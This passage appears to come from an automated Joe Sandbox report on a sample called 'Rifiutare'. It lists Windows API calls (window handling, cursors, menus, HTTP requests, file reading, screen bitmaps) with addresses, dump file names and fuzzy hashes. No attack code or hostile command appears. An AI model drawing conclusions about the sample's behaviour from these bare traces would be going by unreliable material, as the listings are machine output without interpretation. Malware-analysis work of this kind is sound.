                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C962DF
                                                                                • GetWindowRect.USER32(?,?), ref: 00C962E8
                                                                                • _wcslen.LIBCMT ref: 00C9634F
                                                                                • SetWindowTextW.USER32(?,?), ref: 00C9638B
                                                                                • GetDesktopWindow.USER32 ref: 00C96391
                                                                                • GetWindowRect.USER32(00000000), ref: 00C96398
                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C963EF
                                                                                • GetClientRect.USER32(?,?), ref: 00C963FC
                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C96421
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C9644B
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                • String ID:
                                                                                • API String ID: 895679908-0
                                                                                • Opcode ID: b6755a9aab341e4f1f452cbd735aac8719d2bbdbb188f27e60bf40cc77d7cf8b
                                                                                • Instruction ID: 58d2e33f98296f25689f3f977f278a0cf65f9af176d90a5d5dce0cd075dcd38a
                                                                                • Opcode Fuzzy Hash: b6755a9aab341e4f1f452cbd735aac8719d2bbdbb188f27e60bf40cc77d7cf8b
                                                                                • Instruction Fuzzy Hash: 1E717B71900705AFDF20DFA9CE49FAEBBF5FB48704F100928E596A26A0D775EA44CB50
                                                                                APIs
                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00CB066D
                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00CB0678
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00CB0683
                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00CB068E
                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00CB0699
                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00CB06A4
                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 00CB06AF
                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00CB06BA
                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00CB06C5
                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00CB06D0
                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00CB06DB
                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00CB06E6
                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00CB06F1
                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00CB06FC
                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00CB0707
                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00CB0712
                                                                                • GetCursorInfo.USER32(?), ref: 00CB0722
                                                                                • GetLastError.KERNEL32 ref: 00CB0764
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$Load$ErrorInfoLast
                                                                                • String ID:
                                                                                • API String ID: 3215588206-0
                                                                                • Opcode ID: 35d7e0f91d97c85a68eac05fb5ad7010695f3426e090dfa6f37364913fcc1410
                                                                                • Instruction ID: e414ced07b337e86a862e7fc2d1e39f99e116d3be151f2ba688451cda7c7c277
                                                                                • Opcode Fuzzy Hash: 35d7e0f91d97c85a68eac05fb5ad7010695f3426e090dfa6f37364913fcc1410
                                                                                • Instruction Fuzzy Hash: 204151B0D043196ADB109FBA8C89D6EBFE8FF04354F54452AE11DE7291DA78A9018F91
                                                                                APIs
                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00C504E6
                                                                                  • Part of subcall function 00C5050D: InitializeCriticalSectionAndSpinCount.KERNEL32(00D016FC,00000FA0,1F7E7C57,?,?,?,?,00C727D3,000000FF), ref: 00C5053C
                                                                                  • Part of subcall function 00C5050D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00C727D3,000000FF), ref: 00C50547
                                                                                  • Part of subcall function 00C5050D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00C727D3,000000FF), ref: 00C50558
                                                                                  • Part of subcall function 00C5050D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00C5056E
                                                                                  • Part of subcall function 00C5050D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00C5057C
                                                                                  • Part of subcall function 00C5050D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00C5058A
                                                                                  • Part of subcall function 00C5050D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C505B5
                                                                                  • Part of subcall function 00C5050D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00C505C0
                                                                                • ___scrt_fastfail.LIBCMT ref: 00C50507
                                                                                  • Part of subcall function 00C504C3: __onexit.LIBCMT ref: 00C504C9
                                                                                Strings
                                                                                • SleepConditionVariableCS, xrefs: 00C50574
                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00C50542
                                                                                • WakeAllConditionVariable, xrefs: 00C50582
                                                                                • kernel32.dll, xrefs: 00C50553
                                                                                • InitializeConditionVariable, xrefs: 00C50568
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                • API String ID: 66158676-1714406822
                                                                                • Opcode ID: 69d5e40a6e6dfbbed80791b1d94d545a42c2052c1aa80fb8a507aac973d10a4b
                                                                                • Instruction ID: cbd2bf652ea7bb08c6e56c252928cc18f0d38b6ff69312a4ce5589a6e9761bfa
                                                                                • Opcode Fuzzy Hash: 69d5e40a6e6dfbbed80791b1d94d545a42c2052c1aa80fb8a507aac973d10a4b
                                                                                • Instruction Fuzzy Hash: 1321293A641700AFD7112BA8DC06F6E3794EB04B62F34013AFD16D32D0EB7099848AAC
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(00000000,00000000,00CCDBF4), ref: 00CA4E3E
                                                                                • _wcslen.LIBCMT ref: 00CA4E52
                                                                                • _wcslen.LIBCMT ref: 00CA4EB0
                                                                                • _wcslen.LIBCMT ref: 00CA4F0B
                                                                                • _wcslen.LIBCMT ref: 00CA4F56
                                                                                • _wcslen.LIBCMT ref: 00CA4FBE
                                                                                  • Part of subcall function 00C4FE52: _wcslen.LIBCMT ref: 00C4FE5D
                                                                                • GetDriveTypeW.KERNEL32(?,00CF7BD0,00000061), ref: 00CA505A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2055661098-1000479233
                                                                                • Opcode ID: d64d956c4c84b23a4b80089f1b943154115c94facd828ed60ef24d3f1e3a5dcb
                                                                                • Instruction ID: 9b868048790331f755946992993d3b5b0f0568aa3c851f632661f0b2d428af0d
                                                                                • Opcode Fuzzy Hash: d64d956c4c84b23a4b80089f1b943154115c94facd828ed60ef24d3f1e3a5dcb
                                                                                • Instruction Fuzzy Hash: 3AB1D0316083029FC714DF28C890A7EB7E5BF96728F50891DF9A687292D770D985CB92
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00CCDBF4), ref: 00CB488E
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00CB48A0
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00CCDBF4), ref: 00CB48C5
                                                                                • FreeLibrary.KERNEL32(00000000,?,00CCDBF4), ref: 00CB4911
                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,00CCDBF4), ref: 00CB497B
                                                                                • SysFreeString.OLEAUT32(00000009), ref: 00CB4A35
                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00CB4A9B
                                                                                • SysFreeString.OLEAUT32(?), ref: 00CB4AC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 354098117-199464113
                                                                                • Opcode ID: a56360c293c7abef7a00adff19887bb4fea162358cae815063eea28a6dbe1ba2
                                                                                • Instruction ID: bbadbccfc3b3e53cc9f852682bf0b70863d55af13a7f6e0bac4a3b9cea76b78f
                                                                                • Opcode Fuzzy Hash: a56360c293c7abef7a00adff19887bb4fea162358cae815063eea28a6dbe1ba2
                                                                                • Instruction Fuzzy Hash: 12124F71A04119EFDB18CF94C884EEEBBB9FF45714F248098E9159B252D731EE46CBA0
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000,?), ref: 00CC73D2
                                                                                  • Part of subcall function 00C3B0DB: _wcslen.LIBCMT ref: 00C3B0EE
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CC7446
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CC7468
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC747B
                                                                                • DestroyWindow.USER32(?), ref: 00CC749C
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C30000,00000000), ref: 00CC74CB
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC74E4
                                                                                • GetDesktopWindow.USER32 ref: 00CC74FD
                                                                                • GetWindowRect.USER32(00000000), ref: 00CC7504
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CC751C
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CC7534
                                                                                  • Part of subcall function 00C32184: GetWindowLongW.USER32(?,000000EB), ref: 00C32192
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 2429346358-3619404913
                                                                                • Opcode ID: c8d1a370a2571e34958c9e4d46fc03144f74c3b8ebdc17d4920b333fe12640a2
                                                                                • Instruction ID: ade068d37f903f765c1835c0ebef6a7a7b22fb210cd31fcad429da73ab64556e
                                                                                • Opcode Fuzzy Hash: c8d1a370a2571e34958c9e4d46fc03144f74c3b8ebdc17d4920b333fe12640a2
                                                                                • Instruction Fuzzy Hash: 40716770548348AFD725CF18D848F6ABBE9EB89304F040A2DF995872A1C770EA02DF52
                                                                                APIs
                                                                                  • Part of subcall function 00C323E1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C323F2
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00CC974F
                                                                                  • Part of subcall function 00CC7C5B: ClientToScreen.USER32(?,?), ref: 00CC7C81
                                                                                  • Part of subcall function 00CC7C5B: GetWindowRect.USER32(?,?), ref: 00CC7CF7
                                                                                  • Part of subcall function 00CC7C5B: PtInRect.USER32(?,?,?), ref: 00CC7D07
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00CC97B8
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CC97C3
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CC97E6
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CC982D
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00CC9846
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00CC985D
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00CC987F
                                                                                • DragFinish.SHELL32(?), ref: 00CC9886
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00CC9979
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                • API String ID: 221274066-3440237614
                                                                                • Opcode ID: 96666380f783034f5008f0d48e20e342c6c03292483e36a41fab9534cc55ca0f
                                                                                • Instruction ID: 4fdbc7ed22ed7f5a9c4d54e4f3a96623d4d8e981f22c1f564f2dbaced66536e4
                                                                                • Opcode Fuzzy Hash: 96666380f783034f5008f0d48e20e342c6c03292483e36a41fab9534cc55ca0f
                                                                                • Instruction Fuzzy Hash: 23617E71508305AFC705EF50DC89EAFBBE8EF89750F00092DF596931A1DB709A49DB62
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CACCE3
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CACCF6
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CACD0A
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00CACD23
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00CACD66
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00CACD7C
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CACD87
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CACDB7
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00CACE0F
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00CACE23
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00CACE2E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                • String ID:
                                                                                • API String ID: 3800310941-3916222277
                                                                                • Opcode ID: 6eb020123bd6298faf4e8513b96bc4eff11222064178d3a8d37332da09ac2eff
                                                                                • Instruction ID: 35558ccf76afa88375b6de2a3f1582fde0b91427bfcb03d9470c3a49a8121cbb
                                                                                • Opcode Fuzzy Hash: 6eb020123bd6298faf4e8513b96bc4eff11222064178d3a8d37332da09ac2eff
                                                                                • Instruction Fuzzy Hash: BD513AB150060ABFDB219F61C888BAB7BBCFB09758F004429F956D6250D734EE44ABA0
                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00CC8B9A
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00CC8BAA
                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00CC8BB5
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CC8BC2
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00CC8BD0
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00CC8BDF
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00CC8BE8
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00CC8BEF
                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00CC8C00
                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00CD0BFC,?), ref: 00CC8C19
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00CC8C29
                                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 00CC8C49
                                                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00CC8C79
                                                                                • DeleteObject.GDI32(00000000), ref: 00CC8CA1
                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CC8CB7
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                • String ID:
                                                                                • API String ID: 3840717409-0
                                                                                • Opcode ID: 9e118fa97f3637f67b2bf66bbc068bf0fdbb82f00443e6235653420ac6ea789d
                                                                                • Instruction ID: 352fa0ccc27bcbca9439eff1fc0cdd4eaf9a2b85e4f8e7a846370de5604e2a16
                                                                                • Opcode Fuzzy Hash: 9e118fa97f3637f67b2bf66bbc068bf0fdbb82f00443e6235653420ac6ea789d
                                                                                • Instruction Fuzzy Hash: 66410675600209AFDB119F65DC88FAFBBB8FB89711F144068F916D7260DB70AE45CB60
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 00CB2E14
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00CB2E24
                                                                                • CreateCompatibleDC.GDI32(?), ref: 00CB2E30
                                                                                • SelectObject.GDI32(00000000,?), ref: 00CB2E3D
                                                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00CB2EA9
                                                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00CB2EE8
                                                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00CB2F0C
                                                                                • SelectObject.GDI32(?,?), ref: 00CB2F14
                                                                                • DeleteObject.GDI32(?), ref: 00CB2F1D
                                                                                • DeleteDC.GDI32(?), ref: 00CB2F24
                                                                                • ReleaseDC.USER32(00000000,?), ref: 00CB2F2F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                • String ID: (
                                                                                • API String ID: 2598888154-3887548279
                                                                                • Opcode ID: fc7259a7e5fc47382f217cc9f9b5be805df22e52842eee35d1671afc345f65ff
                                                                                • Instruction ID: 4b13921064cfdfe36d3e7eede49c52cab8f1409b11a4df435ab3f36ae828100c
                                                                                • Opcode Fuzzy Hash: fc7259a7e5fc47382f217cc9f9b5be805df22e52842eee35d1671afc345f65ff
                                                                                • Instruction Fuzzy Hash: E861B0B5D00219AFCF05CFA8D884EAEBBB6FF48310F248529E956A7250D771A941DF60
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00C9519E
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00C951E0
                                                                                • _wcslen.LIBCMT ref: 00C951F1
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 00C951FD
                                                                                • _wcsstr.LIBVCRUNTIME ref: 00C95232
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00C9526A
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00C952A3
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 00C952FD
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00C9532F
                                                                                • GetWindowRect.USER32(?,?), ref: 00C953A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                • String ID: ThumbnailClass
                                                                                • API String ID: 1311036022-1241985126
                                                                                • Opcode ID: 8c259f3d7804aa6a12ccfea51711aed495303f4157534ed7f5bc64d8dd49807c
                                                                                • Instruction ID: 9f45952eb9ba669f4d60bd1aeaeead21f929efb18149a7ed1034d78e2eb7663c
                                                                                • Opcode Fuzzy Hash: 8c259f3d7804aa6a12ccfea51711aed495303f4157534ed7f5bc64d8dd49807c
                                                                                • Instruction Fuzzy Hash: DB91D471104B06AFDB0ADF24C898FAEB7A8FF40344F144529FAA582191EB71EE55CB91
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(00D029B0,000000FF,00000000,00000030), ref: 00C9C81E
                                                                                • SetMenuItemInfoW.USER32(00D029B0,00000004,00000000,00000030), ref: 00C9C853
                                                                                • Sleep.KERNEL32(000001F4), ref: 00C9C865
                                                                                • GetMenuItemCount.USER32(?), ref: 00C9C8AB
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00C9C8C8
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00C9C8F4
                                                                                • GetMenuItemID.USER32(?,?), ref: 00C9C93B
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C9C981
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C9C996
                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C9C9B7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
